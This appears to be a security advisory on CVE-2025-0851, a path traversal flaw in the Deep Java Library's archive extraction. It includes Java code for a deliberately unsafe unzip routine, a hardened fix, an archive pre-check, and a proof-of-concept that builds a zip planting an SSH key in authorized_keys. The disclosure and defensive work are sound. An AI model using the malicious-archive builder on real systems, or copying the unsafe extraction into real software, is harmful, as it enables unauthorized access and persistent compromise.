
A newly disclosed vulnerability in the Deep Java Library (DJL) leaves affected systems open to attack.
The vulnerability, identified as CVE-2025-0851 (CVSS 9.8), is a path traversal issue in the ZipUtils.unzip and TarUtils.untar utilities, which DJL uses to extract zip and tar model archives when loading models. It affects DJL versions 0.1.0 through 0.31.0 and stems from a failure to guard against absolute paths in archive entry names during extraction.
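To illustrate this class of bug (this is a minimal sketch, not DJL's actual implementation; the class and method names are hypothetical), the snippet below contrasts a naive zip extraction loop with a hardened variant. The key detail is that Path.resolve() simply returns the entry name when it is already absolute, so an entry named, say, /etc/cron.d/job lands outside the destination directory unless the extractor explicitly checks for it.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;

public class UnzipSketch {

    // Naive extraction: trusts entry names taken from the archive.
    static void unzipNaive(InputStream in, Path destDir) throws IOException {
        try (ZipInputStream zis = new ZipInputStream(in)) {
            ZipEntry entry;
            while ((entry = zis.getNextEntry()) != null) {
                // If entry.getName() is absolute, Path.resolve() ignores destDir
                // and returns that absolute path, so the write escapes destDir.
                Path target = destDir.resolve(entry.getName());
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    Files.copy(zis, target, StandardCopyOption.REPLACE_EXISTING);
                }
            }
        }
    }

    // Hardened variant: reject any entry that resolves outside the destination.
    static void unzipSafe(InputStream in, Path destDir) throws IOException {
        Path root = destDir.toAbsolutePath().normalize();
        try (ZipInputStream zis = new ZipInputStream(in)) {
            ZipEntry entry;
            while ((entry = zis.getNextEntry()) != null) {
                Path target = root.resolve(entry.getName()).normalize();
                if (!target.startsWith(root)) {
                    throw new IOException("Blocked path traversal entry: " + entry.getName());
                }
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    Files.copy(zis, target, StandardCopyOption.REPLACE_EXISTING);
                }
            }
        }
    }
}
```

The normalize-then-startsWith check at the top of the loop is the standard defense: it catches both absolute entry names and "../" sequences before anything is written to disk.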
This vulnerability allows a bad actor to write files to arbitrary locations on a system. A path traversal vulnerability in AI and machine learning frameworks introduces serious security risks, particularly in cloud and enterprise environments where models are frequently shared and deployed. Here’s how attackers could exploit CVE-2025-0851:
- Remote SSH Takeover – By embedding a malicious SSH key in a model archive, attackers could gain persistent access to compromised machines (see the sketch after this list).
- Supply Chain Attacks – AI researchers and data scientists often download pre-trained models from external sources. A compromised archive could introduce backdoors into corporate AI pipelines.
- Cross-Site Scripting (XSS) Attacks – Attackers could inject rogue HTML files into web-accessible directories, compromising web applications and user sessions.
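As a rough illustration of the first scenario, the sketch below builds an archive containing one ordinary-looking model file and one entry whose name is an absolute path. Every file name and the key material are hypothetical placeholders; a vulnerable extractor would write the second entry to the attacker-chosen location, while a patched one rejects it.

```java
import java.io.IOException;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

public class MaliciousArchiveSketch {
    public static void main(String[] args) throws IOException {
        // Hypothetical output file and paths, for illustration only.
        try (OutputStream out = Files.newOutputStream(Path.of("model.zip"));
             ZipOutputStream zos = new ZipOutputStream(out)) {

            // A legitimate-looking model file.
            zos.putNextEntry(new ZipEntry("model/resnet18.pt"));
            zos.write(new byte[] {0});
            zos.closeEntry();

            // An entry whose name is an absolute path. A vulnerable extractor
            // writes it to the victim's authorized_keys file instead of the
            // model directory, giving the attacker SSH access.
            zos.putNextEntry(new ZipEntry("/home/victim/.ssh/authorized_keys"));
            zos.write("ssh-ed25519 AAAA... attacker@example".getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
        }
    }
}
```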
The vulnerability has been patched in DJL 0.31.1. Users are strongly encouraged to update to the latest version to mitigate the risk.
As a workaround, users should avoid model archive files from untrusted sources. It is recommended to only use model archives from official sources such as the DJL Model Zoo, or models they have created and packaged themselves.
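For archives that must be fetched from outside sources, a conservative pre-check can be run before the file is ever handed to DJL. The sketch below is only an illustration under stated assumptions: the ModelArchiveChecker class is hypothetical, only zip archives are covered (tar archives would need a library such as Apache Commons Compress), and the checks are deliberately blunt, rejecting any entry name that is absolute or contains "..".

```java
import java.io.IOException;
import java.nio.file.Path;
import java.util.Enumeration;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

public final class ModelArchiveChecker {

    // Returns true only if every entry name is relative and free of parent-directory hops.
    static boolean isSafeZip(Path archive) throws IOException {
        try (ZipFile zip = new ZipFile(archive.toFile())) {
            Enumeration<? extends ZipEntry> entries = zip.entries();
            while (entries.hasMoreElements()) {
                String name = entries.nextElement().getName();
                // Reject Unix/Windows absolute paths and anything containing ".."
                // (conservative: a name like "foo..bar" is also rejected).
                if (name.startsWith("/") || name.startsWith("\\")
                        || name.matches("^[A-Za-z]:.*")
                        || name.contains("..")) {
                    return false;
                }
            }
        }
        return true;
    }

    public static void main(String[] args) throws IOException {
        Path archive = Path.of(args[0]);
        if (!isSafeZip(archive)) {
            throw new SecurityException("Refusing to load suspicious model archive: " + archive);
        }
        // Only now hand the archive to DJL (or any other loader).
        System.out.println("No traversal-style entry names found in " + archive);
    }
}
```

A check like this complements, but does not replace, upgrading to DJL 0.31.1 or later.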